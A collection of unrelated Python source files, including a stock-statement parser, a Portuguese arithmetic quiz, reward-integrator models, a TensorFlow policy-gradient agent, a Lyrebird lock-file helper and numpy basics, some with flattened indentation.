            stocks_all = lines[57:-21]
            for i in stocks_all:
                stock_temp = i.split()
                # Reassemble the security description from its four split tokens.
                stock = [date, stock_temp[0], stock_temp[2], stock_temp[4]+stock_temp[5]+stock_temp[6]+stock_temp[7], stock_temp[9], stock_temp[10]]
                #print(stock)
                #['1300000006444723', '78169183', 'StateBankofIndia', 'Buy', '21'] example stock row
                sheet_stock.append(stock)
            # One tax row per PDF: date followed by the last token of each tax line.
            tax_temp = [date]
            for i in taxes_all:
                tax_temp.append(i.split()[-1])
            sheet_tax.append(tax_temp)
# Save the workbook of stocks and the workbook of taxes.
workbook_stock.save('stock.xlsx')
workbook_tax.save('tax.xlsx')
20886800929 | from models.calcular import Calcular
def main() -> None:
    """Program entry point: start the quiz with a zeroed score."""
    pontos_iniciais: int = 0
    jogar(pontos_iniciais)
def jogar(pontos: int) -> None: # Função principal
# Recebendo a dificuldade do jogo
dificuldade: int = int(input("Informe o nível de dificuldade desejado [1, 2, 3 ou 4]:"))
calc: Calcular = Calcular(dificuldade) # Instanciar um objeto informando a dificuldade como parametro
print("Informe o resultado para a seguinte operação: ")
calc.mostrar_operacao() # Mostrar a operação
resultado: int = int(input()) # Jogador informa o resultado
# Retornando os pontos para o jogador de acordo com suas respostas.
if calc.checar_resultado(resultado): # Checando se o resultado do jogador está correto ou não
pontos += 1 # Caso a resposta seja verdadeira, acrescentar um ponto
print(f"Você tem {pontos} pontos.")
# Verificando se o usuario deseja continuar jogando
continuar: int = int(input("Deseja continuar no jogo? [1 - Sim, 0- Não]"))
if continuar:
jogar(pontos)
else:
print(f"Você finalizou com {pontos} pontos.")
# Run the game only when this file is executed directly.
if __name__ == '__main__':
    main()
# Small demo lists and loops printing the elements they contain.
lista_de_fruta = ['banana', 'maça', 'uva', 'abacate', 'laranja', 'limao', 'melao']
for frutas in lista_de_fruta:
    print(frutas)

# Count the fruits in lista_de_fruta, printing the running total after each one.
contador = 0
for posicao, _fruta in enumerate(lista_de_fruta, start=1):
    contador = posicao
    print(contador)

# Print the numbers from 0 to 99.
for numero in range(0, 100):
    print(numero)

# Numbers from 0 to 99 stepping by 2.
for numero in range(0, 100, 2):
    print(numero)

# Multiples of 5 from 0 up to and including 100.
for numero in range(0, 105, 5):
    print(numero)

# Loop that shows i for as long as it stays below 10.
i = 0
while i < 10:
    print('i ainda é menor que 10:', i)
    i += 1
| jemalicisou/Python-basico | estruturas_de_laco_python.py | estruturas_de_laco_python.py | py | 998 | python | pt | code | 0 | github-code | 13 |
24718332124 | import numpy as np
from scipy.stats import gamma
from matplotlib import pyplot as plt
import seaborn as sns
def m1(env_state):
    """Model 1: the integrator value is simply the elapsed time on the patch."""
    elapsed = env_state["t"]
    return elapsed
def m2(env_state):
    """Model 2: number of steps since the most recent reward (0 if rewarded now).

    Raises ValueError if no reward of size `rewsize` has occurred up to time t.
    """
    t = env_state["t"]
    recent_first = list(reversed(env_state["rews"][:t + 1]))
    return recent_first.index(env_state["rewsize"])
def m3(env_state):
    """Model 3: linear reward integrator -- gains `gain` per reward received
    and loses `decay` per elapsed time step, truncated toward zero."""
    gain, decay = 3, 1
    t = env_state["t"]
    rewards_so_far = sum(env_state["rews"][:t + 1])
    return int(gain * rewards_so_far / env_state["rewsize"] - decay * t)
def m4(env_state):
    """Model 4: Bayesian posterior-mean estimate of the reward rate N0.

    Gamma(a0, b0) prior (prior mean a0/b0 = 0.25) updated with the observed
    reward count z over an exponentially saturating effective time with
    constant tau: posterior mean = (a0 + z) / (b0 + tau * (1 - exp(-t/tau))).
    """
    prior_a, prior_b, tau = 1, 4, 8
    t = env_state["t"]
    observed = np.sum(env_state["rews"][:t + 1]) / env_state["rewsize"]
    effective_time = tau * (1 - np.exp(-t / tau))
    return (prior_a + observed) / (prior_b + effective_time)
def m5(env_state):
    """Model 5: recency-biased integrator -- past rewards (before time t) count
    with weight `gain`, the current step's reward with weight `recency_boost`,
    and elapsed time is penalized with weight `decay`."""
    recency_boost = 3
    gain = 2
    decay = 1
    t = env_state["t"]
    past = np.sum(env_state["rews"][:(t)]) / env_state["rewsize"]
    return gain * past + env_state["rews"][t] * recency_boost - decay * t
# state = {"rews" : [1,0,0,0,1,0,0,1,0,1,0,1,0] , "t" : 0,"rewsize":1}
state = {"rews" : [1,0,1,0,1,0,0,1] , "t" : 0,"rewsize":1}
m1list = []
m2list = []
m3list = []
m4list = []
m5list = []
for i in range(len(state["rews"])):
m1list.append(m1(state))
m2list.append(m2(state))
m3list.append(m3(state))
m4list.append(m4(state))
m5list.append(m5(state))
state["t"] += 1
x = np.linspace(0,1,100)
dist = gamma.pdf(1,4,x)
plt.plot(x,dist)
plt.title("Gamma prior")
plt.xlabel('N0')
plt.ylabel('Probability Mass')
plt.show()
plt.figure()
# plt.plot(np.array(m1list) / sum(m1list))
# plt.title('Standardized Reward Integration for Sequence: [1,0,0,0,1,0,0,1,0,1,0,1,0]')
# plt.plot(np.array(m1list) / np.std(m1list),label = "Time")
# plt.plot(-np.array(m2list) / np.std(m2list),label = "Memoryless Integrator")
# plt.plot(np.array(m3list) / np.std(m3list),label = "Basic Integrator (a=3, b=1)")
# plt.plot(np.array(m4list) / np.std(m4list),label = "Bayesian Estimation of N0 (a0=1, b0=4)")
# plt.plot(np.array(m5list) / np.std(m5list),label = "Recency-Biased Integrator (a=1, b=2, x=3)")
plt.title('Reward Integrator Values for a trial with rewards at 0, 2, 4, and 7 seconds')
plt.plot(np.array(m1list),label = "Model 1: Time")
plt.plot(np.array(m2list),label = "Model 2: Time since last reward")
plt.plot(-np.array(m3list) + 3,label = "Model 3: Increase with time and dip with reward")
plt.xlabel('Time')
plt.ylabel('Reward Integrator Value')
plt.legend()
plt.show()
| sternj98/patchForagingQLearning | integrators_demo.py | integrators_demo.py | py | 2,382 | python | en | code | 2 | github-code | 13 |
30933676745 | import numpy as np
import tensorflow as tf
class PolicyGradient:
    def __init__(self, min_action, max_action, feature_size,
                 hidden_units=10, learning_rate=0.01, gamma=0.95, tf_log_dir=None):
        """Monte-Carlo policy-gradient agent for a 1-D continuous action space.

        Args:
            min_action / max_action: bounds the sampled action is clipped to.
            feature_size: dimensionality of the state feature vector.
            hidden_units: int or list of ints -- hidden-layer sizes.
            learning_rate: Adam learning rate.
            gamma: per-step reward discount factor.
            tf_log_dir: optional directory for a TensorBoard summary writer.
        """
        self.min_action = min_action
        self.max_action = max_action
        self.feature_size = feature_size
        # Normalize a single int into a one-element list of layer sizes.
        self.hidden_units = [hidden_units] if isinstance(hidden_units, int) else hidden_units
        self.lr = learning_rate
        self.gamma = gamma
        self.step_counter = 0
        self.log_writer = None
        # Build the static graph, then start a session (TensorFlow 1.x API).
        self._build_network()
        self.sess = tf.Session()
        self.sess.run(tf.global_variables_initializer())
        # Per-episode buffers, filled by store_transition() and flushed by learn().
        self.ep_states = []
        self.ep_actions = []
        self.ep_rewards = []
        if tf_log_dir:
            self.log_writer = tf.summary.FileWriter(tf_log_dir, self.sess.graph)
def _build_network(self):
self.s_pl = tf.placeholder(tf.float32, [None, self.feature_size], name="s")
self.a_pl = tf.placeholder(tf.float32, [None], name="a")
self.v_pl = tf.placeholder(tf.float32, [None], name="v_discounted")
if len(self.hidden_units) == 1:
out = tf.layers.dense(self.s_pl, self.hidden_units[0],
activation=tf.nn.relu, name="hidden")
else:
out = self.s_pl
for (i, hidden_unit) in enumerate(self.hidden_units):
out = tf.layers.dense(out, hidden_unit,
activation=tf.nn.relu, name="hidden_{:d}".format(i))
with tf.variable_scope("out"):
self.mu = tf.squeeze(tf.layers.dense(out, units=1), name="mu")
self.sigma = tf.squeeze(tf.layers.dense(out, units=1, activation=tf.nn.softplus), name="sigma")
self.dist = tf.distributions.Normal(loc=self.mu, scale=self.sigma+0.001)
self.action = tf.clip_by_value(
self.dist.sample(sample_shape=1), self.min_action, self.max_action)
with tf.variable_scope("loss"):
self.loss = -self.dist.log_prob(self.action)*self.v_pl - 0.01*self.dist.entropy()
with tf.variable_scope("train"):
self.train_op = tf.train.AdamOptimizer(self.lr).minimize(self.loss)
def choose_action(self, s):
if len(s.shape) == 1:
s = s[np.newaxis, :]
return self.sess.run(self.action, feed_dict={self.s_pl: s})
def store_transition(self, s, a, r):
self.ep_states.append(s)
self.ep_actions.append(a)
self.ep_rewards.append(r)
def learn(self):
discounted_r = self._discounted_rewards()
self.sess.run(self.train_op, feed_dict={
self.s_pl: np.vstack(self.ep_states), # shape=[None, n_obs]
self.a_pl: np.array(self.ep_actions).reshape([-1]), # shape=[None, ]
self.v_pl: discounted_r, # shape=[None, ]
})
self.ep_states, self.ep_actions, self.ep_rewards = [], [], []
# return discounted_ep_rs_norm
def _discounted_rewards(self):
discounted_ep_rs = np.zeros_like(self.ep_rewards)
running_add = 0
for t in reversed(range(0, len(self.ep_rewards))):
running_add = running_add * self.gamma + self.ep_rewards[t]
discounted_ep_rs[t] = running_add
# normalize episode rewards
discounted_ep_rs -= np.mean(discounted_ep_rs)
discounted_ep_rs /= np.std(discounted_ep_rs)
return discounted_ep_rs
| zengxy/rl_exercise | learner/PolicyGradient_Continuous.py | PolicyGradient_Continuous.py | py | 3,465 | python | en | code | 0 | github-code | 13 |
20244910544 | import sys
# BOJ 10828: execute n stack commands read from stdin, printing the result
# of every query command (-1 when the stack is empty where required).
command_count = int(sys.stdin.readline())
stack = []
for _ in range(command_count):
    tokens = sys.stdin.readline().split()
    op = tokens[0]
    if op == 'push':
        stack.append(tokens[1])
    elif op == 'pop':
        print(stack.pop() if stack else -1)
    elif op == 'top':
        print(stack[-1] if stack else -1)
    elif op == 'size':
        print(len(stack))
    elif op == 'empty':
        print(0 if stack else 1)
29807397956 | import fcntl
from pathlib import Path
lock_file_path = Path(Path('/tmp') / 'lyrebird.lock')
def place_lock():
    '''
    Place a lock file in /tmp to prevent two instances of Lyrebird
    running at once.

    Returns the open lock file, which must be kept open for the lifetime
    of the application (closing it releases the flock).  Returns ``None``
    when the lock could not be acquired, i.e. another instance of
    Lyrebird is most likely already running.
    '''
    lock_file = open(lock_file_path, 'w')
    try:
        fcntl.flock(lock_file, fcntl.LOCK_EX | fcntl.LOCK_NB)
    except OSError:
        # Bug fix: was a bare `except:` and leaked the file handle when the
        # lock was already held.  flock() failures surface as OSError
        # (BlockingIOError when LOCK_NB cannot acquire).
        lock_file.close()
        return None
    return lock_file
def destroy_lock():
    '''
    Destroy the lock file.  The lock file handle should be closed before
    running this.  A missing file is ignored: the previous
    exists()-then-unlink() pair raced with concurrent deleters (TOCTOU).
    '''
    try:
        lock_file_path.unlink()
    except FileNotFoundError:
        pass
| lyrebird-voice-changer/lyrebird | app/core/lock.py | lock.py | py | 737 | python | en | code | 1,770 | github-code | 13 |
def dfs(k, graph, visited):
    """Depth-first search: mark every computer reachable from k in the
    adjacency matrix `graph` by setting its slot in `visited` to 1."""
    visited[k] = 1
    for neighbor, connected in enumerate(graph[k]):
        if connected == 1 and visited[neighbor] == 0:
            dfs(neighbor, graph, visited)
def solution(n, computers):
    """Count connected components ("networks") among n computers.

    Args:
        n: number of computers.
        computers: n x n adjacency matrix (computers[i][j] == 1 when
            i and j are directly connected; the diagonal is 1).

    Returns:
        The number of connected components.

    Uses an iterative stack-based DFS instead of the recursive helper so
    large inputs cannot hit Python's recursion limit.
    """
    visited = [0] * n
    answer = 0
    for start in range(n):
        if visited[start]:
            continue
        # New component discovered; flood-fill it iteratively.
        answer += 1
        visited[start] = 1
        stack = [start]
        while stack:
            node = stack.pop()
            for neighbor in range(n):
                if computers[node][neighbor] == 1 and not visited[neighbor]:
                    visited[neighbor] = 1
                    stack.append(neighbor)
    return answer
| gilbutITbook/080338 | 12장/네트워크.py | 네트워크.py | py | 367 | python | en | code | 32 | github-code | 13 |
43084839642 | #
# @lc app=leetcode.cn id=653 lang=python3
#
# [653] 两数之和 IV - 输入 BST
#
# @lc code=start
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    def findTarget(self, root: "Optional[TreeNode]", k: int) -> bool:
        """Return True if two *distinct* nodes of the tree sum to k.

        Classic complement-set walk: before descending, record k - val for
        the current node; a later node whose value is already recorded
        completes a pair.  Checking membership before recording prevents a
        node from pairing with itself (e.g. k == 2 * node.val).

        Improvements over the original: a set instead of a dict with dummy
        values; true short-circuit via `or` instead of a per-instance
        `self.success` flag (the old version kept recursing after a hit);
        string annotations so the module imports even where Optional /
        TreeNode are not defined.
        """
        complements = set()

        def visit(node) -> bool:
            if node is None:
                return False
            if node.val in complements:
                return True
            complements.add(k - node.val)
            return visit(node.left) or visit(node.right)

        return visit(root)
# @lc code=end
| Guo-xuejian/leetcode-practice | 653.两数之和-iv-输入-bst.py | 653.两数之和-iv-输入-bst.py | py | 900 | python | en | code | 1 | github-code | 13 |
4555187047 |
import json
from datetime import datetime
from dashboard.models import Complaint, Notification, serialize
from dashboard.views.Customers import extractComplaintObj
from django.contrib.auth.decorators import login_required
from django.http import JsonResponse
from django.shortcuts import redirect
@login_required
def notif_api(request):
    """AJAX endpoint listing active notifications, newest first, with each
    created_at rewritten as a human-readable age via get_days().
    Non-AJAX requests are redirected to the customer dashboard."""
    if not request.is_ajax():
        return redirect("customer_dashboard")
    now = datetime.now()
    notifications = Notification.objects.filter(active=True).values(
        'msg', 'created_at').order_by('-created_at')
    for entry in notifications:
        elapsed = now - entry['created_at']
        entry['created_at'] = get_days(elapsed.total_seconds())
    return JsonResponse({"data": list(notifications)}, safe=False)
@login_required
def complaint_api(request, slug):
    """AJAX endpoint returning one complaint plus its customer's contact
    details.

    Responds with ``{"status": 404}`` when the complaint id is unknown and
    ``{"status": 200, "data": {...}}`` otherwise; non-AJAX requests are
    redirected to the login flow.
    """
    if request.is_ajax():
        try:
            complaint = Complaint.objects.get(complaint_id=slug)
        except Complaint.DoesNotExist:
            # Bug fix: was a bare `except:`, which also reported programming
            # errors (bad field names, DB outages) as a 404.  Only a missing
            # row is a 404; everything else should surface.
            return JsonResponse({"status": 404}, safe=False)
        customer_info = {'name': complaint.customer.user.first_name + " " + complaint.customer.user.last_name,
                         'email': complaint.customer.user.email,
                         'contact': complaint.customer.contact}
        complaint = json.loads(serialize([complaint]))[0]
        return JsonResponse({"status": 200, "data": {**extractComplaintObj(complaint), **customer_info}}, safe=False)
    else:
        return redirect("login-redirects")
def get_days(ttime):
    """Render a duration given in seconds as a coarse age string:
    '"N days ago"' when at least one full day has passed, otherwise
    '"N hrs ago"' (which includes "0 hrs ago" for under an hour)."""
    days, remainder = divmod(ttime, 24 * 3600)
    if days:
        return "%d days ago" % days
    return "%d hrs ago" % (remainder // 3600)
| avisionx/fms-portal-iiitd | dashboard/views/Common.py | Common.py | py | 1,679 | python | en | code | 0 | github-code | 13 |
38424605822 | from models.template import *
class User(Template):
    """Mongo-backed model for a YouTube channel ("User") page.

    All scraping/storage configuration lives in class attributes that the
    Template base class consumes; the XPaths target elements of a channel
    "About" page.
    """

    # Storage coordinates consumed by Template (DB alias + collection name).
    meta = {
        'db_alias': 'youtube',
        'collection': 'User'
    }
    # Fields to index.  The None value presumably selects Template's default
    # index options -- NOTE(review): confirm against Template.
    index = {
        "id": None
    }
    # Field name -> declared type and the XPath used to extract it.
    # NOTE(review): "view_count"'s XPath lacks the leading '//' the sibling
    # entries use -- verify it still matches.
    fields = {
        "id": {"type": "string"},
        "name": {"type": "string", "xpath": "//*[@id='text-container']"},
        "subscriber_count": {"type": "int", "xpath": "//*[@id='subscriber-count']"},
        "view_count": {"type": "int", "xpath": "*[@id='right-column']/yt-formatted-string[3]"},
        "description": {"type": "string", "xpath": "//*[@id='description-container']/yt-formatted-string[2]"},
        "detail": {"type": "string", "xpath": "//*[@id='details-container']/table"},
        "date_joined": {"type": "datetime", "xpath": "//*[@id='right-column']/yt-formatted-string[2]"}
    }
    # Related models; none for this collection.
    connections = {
    }

    def __new__(cls, *args, **kwargs):
        # Delegate instance creation to Template with this model's storage
        # coordinates.  args/kwargs are accepted but not forwarded --
        # NOTE(review): verify Template deliberately ignores them here.
        return Template.__new__(cls, Class=Template, database=cls.meta["db_alias"], collection=cls.meta["collection"])

    def __init__(self, data):
        # Populate the instance from the raw scraped-data dict via Template.
        super().__init__(data=data)
18396323614 | ### SNEK GAME ###
# just another snek game
# -dsplayerX #
#
from tkinter import *
import random
# Game space parameters (pixels); the board is a 20x20 grid of cells.
GAME_WIDTH = 600
GAME_HEIGHT = 600
SPACE_SIZE = 30  # side length of one grid cell
# Starting snake size (number of segments)
BODY_PARTS = 3
# Snake speed parameters: the tick delay in ms passed to window.after(),
# so a smaller value means a faster snake.
START_SPEED = 120
MAX_SPEED = 20        # fastest allowed tick (lower bound on the delay)
SPEED_REDUCTION = 2   # delay decrease each time food is eaten
# Color values for background and subjects
SNAKE_COLOUR = "#333333"
FOOD_COLOUR = "#de0713"
BACKGROUND_COLOR = "#8cb281"
class Snake:
    """The player snake: parallel lists of grid coordinates and the canvas
    rectangle ids drawn for them (head first)."""

    def __init__(self):
        self.body_size = BODY_PARTS
        # All segments start stacked on the top-left cell; next_turn()
        # spreads them out as the snake moves.
        self.coordinates = [[0, 0] for _ in range(BODY_PARTS)]
        self.squares = [
            canvas.create_rectangle(
                x + 1.5, y + 1.5, x + SPACE_SIZE - 1.5, y + SPACE_SIZE - 1.5,
                fill=SNAKE_COLOUR, tag="snake")
            for x, y in self.coordinates
        ]
class Food:
    """A food pellet drawn on a random free-of-nothing grid cell."""

    def __init__(self):
        # Bug fix: use integer division for the cell count.  The original
        # divided with `/`, passing float bounds to random.randint, which
        # raises on modern Python (randrange rejects non-integer arguments).
        x = random.randint(0, (GAME_WIDTH // SPACE_SIZE) - 1) * SPACE_SIZE
        y = random.randint(0, (GAME_HEIGHT // SPACE_SIZE) - 1) * SPACE_SIZE
        self.coordinates = [x, y]
        canvas.create_oval(x + 5, y + 5, x + SPACE_SIZE - 5, y + SPACE_SIZE - 5, fill=FOOD_COLOUR, outline=FOOD_COLOUR, tag="food")
def next_turn(snake, food):
    """Advance the game one tick: move the snake, handle food and
    collisions, then reschedule itself via Tk's after()."""
    global score
    global snake_speed
    # Current head cell.
    x, y = snake.coordinates[0]
    if direction == "up":
        y -= SPACE_SIZE
    elif direction == "down":
        y += SPACE_SIZE
    elif direction == "left":
        x -= SPACE_SIZE
    elif direction == "right":
        x += SPACE_SIZE
    # Grow a new head square in the travel direction.
    snake.coordinates.insert(0, (x, y))
    square = canvas.create_rectangle(x + 1.5, y + 1.5, x + SPACE_SIZE - 1.5, y + SPACE_SIZE - 1.5, fill=SNAKE_COLOUR, outline=SNAKE_COLOUR)
    snake.squares.insert(0, square)
    if (x == food.coordinates[0]) and (y == food.coordinates[1]):
        # Ate the food: keep the tail (so the snake grows), speed up until
        # the MAX_SPEED floor, and respawn the food.
        score += 1
        if snake_speed > MAX_SPEED:
            snake_speed -= SPEED_REDUCTION
        label.config(text="Score: {} ".format(score))
        canvas.delete("food")
        food = Food()
    else:
        # No food this tick: drop the tail so length stays constant.
        del snake.coordinates[-1]
        canvas.delete(snake.squares[-1])
        del snake.squares[-1]
    if check_collisions(snake):
        global highscore
        if score > highscore:
            highscore = score
        window.after(350) # showing snake crash for a brief time
        game_over()
        # Restart automatically after the game-over countdown.
        window.after(3000, start_game)
    else:
        # Schedule the next tick; snake_speed is the delay in ms.
        window.after(snake_speed, next_turn, snake, food)
def change_direction(new_direction):
    """Key-binding callback: steer the snake, ignoring 180-degree reversals
    (the snake cannot turn back on itself) and unknown directions.

    Replaces the original four-way duplicated if/elif chain with a lookup
    of each direction's opposite.
    """
    global direction
    opposites = {'up': 'down', 'down': 'up', 'left': 'right', 'right': 'left'}
    if new_direction in opposites and direction != opposites[new_direction]:
        direction = new_direction
def check_collisions(snake):
    """Return True when the snake's head left the board or overlaps its own
    body, else False.

    The original fell through and implicitly returned None on the
    no-collision path; callers relied on truthiness.  An explicit bool is
    returned now.
    """
    head_x, head_y = snake.coordinates[0]
    # Wall collision.
    if not (0 <= head_x < GAME_WIDTH and 0 <= head_y < GAME_HEIGHT):
        return True
    # Self collision: head against any body segment.
    for body_x, body_y in snake.coordinates[1:]:
        if head_x == body_x and head_y == body_y:
            return True
    return False
def game_over():
    """Clear the board and show the game-over screen (score, high score)
    plus a textual "3 2 1" countdown; the caller schedules start_game()."""
    global score
    global highscore
    canvas.delete(ALL)
    canvas.create_text(canvas.winfo_width()/2, canvas.winfo_height()/3.5, font=("arial", 60, "bold"), text="GAME OVER!", fill="#de0713", tag="gameover")
    canvas.create_text(canvas.winfo_width()/2, canvas.winfo_height()/2, font=("arial", 36), text="Your Score: {}".format(score), fill="#C8FCEA", tag="yourscore")
    canvas.create_text(canvas.winfo_width()/2, canvas.winfo_height()/1.5, font=("arial", 24), text="High Score: {}".format(highscore), fill="#ffe044", tag="highscore")
    canvas.create_rectangle(200, 485,400,540, fill="#333333", outline="black")
    canvas.create_text(canvas.winfo_width()/2, canvas.winfo_height()/1.2, font=("arial", 14), text="Game will restart in... ", fill="white", tag="gamestart")
    gamestartcount = canvas.create_text(canvas.winfo_width()/2, canvas.winfo_height()/1.15, font=("arial", 14), text="", fill="white", tag="gamestartcount")
    count_string = "3 2 1"
    #Time delay in milliseconds
    delta = 500
    delay = 0
    # Reveal growing prefixes of "3 2 1" every `delta` ms.  The default
    # argument (s=s) binds each prefix at lambda-creation time; without it,
    # every scheduled callback would see the final value of s.
    for i in range(len(count_string) + 1):
        s = count_string[:i]
        update_text = lambda s=s: canvas.itemconfigure(gamestartcount, text=s)
        canvas.after(delay, update_text)
        delay += delta
def start_game():
    """Clear the board, reset the round state and kick off the tick loop."""
    global score
    global direction
    global snake_speed
    canvas.delete(ALL)
    # Round-start values.
    direction = 'down'
    score = 0
    snake_speed = START_SPEED
    label.config(text="Score: {}".format(score))
    next_turn(Snake(), Food())
def stop_game():
    """Quit-button callback: tear down the main window, ending mainloop()."""
    window.destroy()
# Build the main window and widgets, then start the game loop.
window = Tk()
window.title("Snek Game")
window.resizable(False, False)
# Setting game start values (mutated by next_turn/change_direction/start_game)
snake_speed = START_SPEED
score = 0
highscore = 0
direction = 'down'
# Score Label on top
label = Label(window, text="Score: {} ".format(score), font=('arial', 36))
label.pack()
# Quit Button
button = Button(window, text= "Quit", font=("arial",12), command=stop_game, bg="#333333", fg="#F5F5F5")
button.place(x = 520, y = 15)
canvas = Canvas(window, bg=BACKGROUND_COLOR, height=GAME_HEIGHT, width=GAME_WIDTH)
canvas.pack()
window.update()
# Center the window on the screen (update() above makes winfo_* accurate).
window_width = window.winfo_width()
window_height = window.winfo_height()
screen_width = window.winfo_screenwidth()
screen_height = window.winfo_screenheight()
x = int((screen_width/2) - (window_width/2))
y = int((screen_height/2) - (window_height/2))
window.geometry(f"{window_width}x{window_height}+{x}+{y}")
# Keybinds
window.bind('<Up>', lambda event: change_direction('up'))
window.bind('<Down>', lambda event: change_direction('down'))
window.bind('<Left>', lambda event: change_direction('left'))
window.bind('<Right>', lambda event: change_direction('right'))
# Alternate Keybinds (WASD)
window.bind('<w>', lambda event: change_direction('up'))
window.bind('<s>', lambda event: change_direction('down'))
window.bind('<a>', lambda event: change_direction('left'))
window.bind('<d>', lambda event: change_direction('right'))
start_game()
window.mainloop()
2883610088 | from absl.testing import absltest
from absl.testing import parameterized
import flax
import jax
import numpy as np
from sam.sam_jax.models import load_model
class LoadModelTest(parameterized.TestCase):
    """Smoke tests for load_model.get_model: model construction, forward
    shape, and exact parameter counts."""

    # Parametrized because other models will be added in following CLs.
    @parameterized.named_parameters(
        ('WideResnet_mini', 'WideResnet_mini'),
        ('WideResnet_ShakeShake_mini', 'WideResnet_ShakeShake_mini'),
        ('Pyramid_ShakeDrop_mini', 'Pyramid_ShakeDrop_mini'))
    def test_CreateModel(self, model_name: str):
        """get_model returns a flax (model, state) pair mapping a 32x32 RGB
        batch to per-class logits."""
        model, state = load_model.get_model(model_name, 1, 32, 10)
        self.assertIsInstance(model, flax.nn.Model)
        self.assertIsInstance(state, flax.nn.Collection)
        # NHWC batch of one 32x32 RGB image.
        fake_input = np.zeros([1, 32, 32, 3])
        with flax.nn.stateful(state, mutable=False):
            logits = model(fake_input, train=False)
        self.assertEqual(logits.shape, (1, 10))

    @parameterized.named_parameters(
        ('WideResnet28x10', 'WideResnet28x10'),
        ('WideResnet28x6_ShakeShake', 'WideResnet28x6_ShakeShake'),
        ('Pyramid_ShakeDrop', 'Pyramid_ShakeDrop'))
    def test_ParameterCount(self, model_name: str):
        """Total parameter counts match the AutoAugment-paper models."""
        # Parameter count from the autoaugment paper models, 100 classes:
        reference_parameter_count = {
            'WideResnet28x10': 36278324,
            'WideResnet28x6_ShakeShake': 26227572,
            'Pyramid_ShakeDrop': 26288692,
        }
        model, _ = load_model.get_model(model_name, 1, 32, 100)
        parameter_count = sum(np.prod(e.shape) for e in jax.tree_leaves(model))
        self.assertEqual(parameter_count, reference_parameter_count[model_name])
if __name__ == '__main__':
absltest.main()
| google-research/sam | sam_jax/models/load_model_test.py | load_model_test.py | py | 1,617 | python | en | code | 492 | github-code | 13 |
25240501376 | from itertools import count as count_from
# Index of each letter in the 31-letter cipher alphabet used to address the
# 31x31 bigram table.  Ё and Й are intentionally absent; the CLI below folds
# them onto Е and И before encrypting.
LANGUAGE = {
    'А': 0, 'Б': 1, 'В': 2, 'Г': 3,
    'Д': 4, 'Е': 5, 'Ж': 6, 'З': 7,
    'И': 8, 'К': 9, 'Л': 10, 'М': 11,
    'Н': 12, 'О': 13, 'П': 14, 'Р': 15,
    'С': 16, 'Т': 17, 'У': 18, 'Ф': 19,
    'Х': 20, 'Ц': 21, 'Ч': 22, 'Ш': 23,
    'Щ': 24, 'Ъ': 25, 'Ы': 26, 'Ь': 27,
    'Э': 28, 'Ю': 29, 'Я': 30,
}
def str_to_append(_str):
    """Zero-pad a numeric string on the left to width 3 ('7' -> '007').

    Uses str.zfill, which matches the old hand-rolled behaviour for the
    1-3 character inputs produced by build_array() and, unlike the
    original, returns the string unchanged (instead of None) for longer
    inputs.
    """
    return _str.zfill(3)
def build_array():
    """Build the 31x31 bigram code table.

    Cell (i, j) holds the zero-padded ordinal of the pair: '001' for
    (0, 0) up to '961' for (30, 30), exactly as the original two-pass
    version (itertools counter + in-place reformat loop) produced, but in
    one comprehension with direct formatting.
    """
    return [['{:03d}'.format(row * 31 + col) for col in range(1, 32)]
            for row in range(31)]
def combine_word(_word):
    """Split the word into letter pairs for bigram encryption.

    An odd-length word is padded with 'Я' so the last pair is complete;
    an empty word yields an empty list.
    """
    padded = _word if len(_word) % 2 == 0 else _word + 'Я'
    return [padded[i:i + 2] for i in range(0, len(padded), 2)]
def encrypt(combined, table):
    """Map each letter pair to its 3-digit table code.

    Codes are space-separated, including a trailing space, which is the
    exact format decrypt() consumes.
    """
    codes = (table[LANGUAGE[pair[0]]][LANGUAGE[pair[1]]] for pair in combined)
    return ''.join(code + ' ' for code in codes)
def decrypt(cipher, table):
    """Invert encrypt(): map each space-separated 3-digit code back to its
    letter pair.

    Builds the reverse lookups once (code -> letter pair) instead of the
    original O(31*31) scan of the whole table for every token plus two
    scans of LANGUAGE per match.  Unknown tokens -- including the empty
    token produced by encrypt()'s trailing space -- contribute nothing,
    matching the old behaviour.
    """
    index_to_letter = {idx: letter for letter, idx in LANGUAGE.items()}
    code_to_pair = {}
    for i, row in enumerate(table):
        for j, code in enumerate(row):
            code_to_pair[code] = index_to_letter[i] + index_to_letter[j]
    result = ''
    for token in cipher.split(' '):
        result += code_to_pair.get(token, '')
    return result
if __name__ == '__main__':
    # Interactive round-trip demo: encrypt a typed word, then decrypt a
    # typed cipher with the same table.
    print('Enter the word')
    _word = input()
    _word = _word.upper()
    # The 31-letter alphabet omits Ё and Й; fold them onto Е and И.
    _word = _word.replace('Ё', 'Е')
    _word = _word.replace('Й', 'И')
    print('Encrypt:')
    table = build_array()
    combined_word = combine_word(_word)
    print(encrypt(combined_word, table))
    print('Decrypt:')
    print('Enter the cipher:')
    cipher = input()
    print(decrypt(cipher, table))
| RMalsonR/Crypt | Block Ciphers/bigram_cipher_ports.py | bigram_cipher_ports.py | py | 2,304 | python | en | code | 0 | github-code | 13 |
8036345543 | #!/usr/bin/python3
""" Fewest coins for change"""
def makeChange(coins, total):
    """Return the fewest coins needed to meet ``total``, or -1 if it
    cannot be made exactly.

    Bottom-up dynamic programming over every amount up to total.  The
    original greedy largest-coin-first approach is wrong for arbitrary
    coin systems (e.g. coins=[4, 3], total=6 needs 3+3, but greedy takes
    a 4 and fails), and it also mutated the caller's list via an in-place
    sort; both defects are fixed here.

    Args:
        coins: available denominations (unlimited supply of each).
        total: target amount.

    Returns:
        Minimum coin count; 0 when total <= 0; -1 when unreachable.
    """
    if total <= 0:
        return 0
    INF = float('inf')
    # dp[a] = fewest coins summing to amount a.
    dp = [0] + [INF] * total
    for amount in range(1, total + 1):
        for coin in coins:
            if 0 < coin <= amount and dp[amount - coin] + 1 < dp[amount]:
                dp[amount] = dp[amount - coin] + 1
    return dp[total] if dp[total] != INF else -1
| Muna-Redi/alx-interview | 0x08-making_change/0-making_change.py | 0-making_change.py | py | 431 | python | en | code | 0 | github-code | 13 |
2055340453 | import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
# --- Array creation basics ---
arr = np.array([1,2,3,4,5])
print(arr)
print(type(arr))
# no difference between passing a tuple and a list to np.array
arr = np.array((1, 2, 3, 4, 5))
print(arr)
print(type(arr))
# Scalar or 0-D arrays
scalar = np.array(42)
print(scalar)
print(type(scalar))
# Create a 1D array from a list
arr1=np.array([1,2,3,4,5])
print(arr1)
# Create a 2D array from a list of lists
arr2= np.array([[1,2,3],[4,5,6]])
print(arr2)
